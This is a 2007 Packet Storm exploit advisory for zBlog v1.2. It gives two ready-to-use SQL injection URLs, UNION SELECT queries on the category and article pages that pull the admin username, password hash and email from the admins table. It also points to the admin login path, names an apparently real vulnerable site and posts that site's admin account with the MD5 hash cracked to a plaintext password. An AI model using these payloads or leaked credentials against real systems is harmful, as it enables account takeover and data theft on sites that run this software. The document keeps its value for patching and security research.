zblog-sql.txt

2007-12-24T00:00:00
ID PACKETSTORM:62022
Type packetstorm
Reporter H-T Team
Modified 2007-12-24T00:00:00

Description

                                        
                                            `#########################################################################  
zBlog v1.2 Remote SQL Injection Exploit  
#########################################################################  
  
  
## AUTHOR : H-T Team ( HouSSamix _ ToXiC350 _ CoNaN )  
## HOME : http://no-hack.net  
  
## Script : zBlog  
## Version : 1.2   
## Site : http://kaxz01.free.fr/  
## Download : http://kaxz01.free.fr/fichiers/zBlog.zip  
  
## EXPLOITS :  
  
[1]  
http://server.com/Path/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20[table prefix]_admins--  
[2]  
http://server.com/Path/index.php?page=articles&article=-1%20union%20select%201,pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13,14,15,16,17,email_admin%20from%20[table prefix]_admins--  
  
[table prefix] = by default it is zblog  
  
ex : http://Site.com/zBlog/index.php?page=articles&article=-1%20union%20select%201,pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13,14,15,16,17,email_admin%20from%20zblog_admins--  
  
## Note  
admin login is at /admin/  
  
## GREETZ : RoMaNcYxHaCkEr , Mahmood_Ali , C_m and all musulmans hackers  
  
#########################################################################  
zBlog v1.2 Remote SQL Injection Exploit  
#########################################################################  
  
exemple of site vulnerable  
  
http://www.xxx.org/zblog/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20zblog_admins--  
  
  
account admin with password md5 cracked  
  
user >> Selim  
pass >> 6a81060b83b919bc115112bf840eca63 = miles  
  
`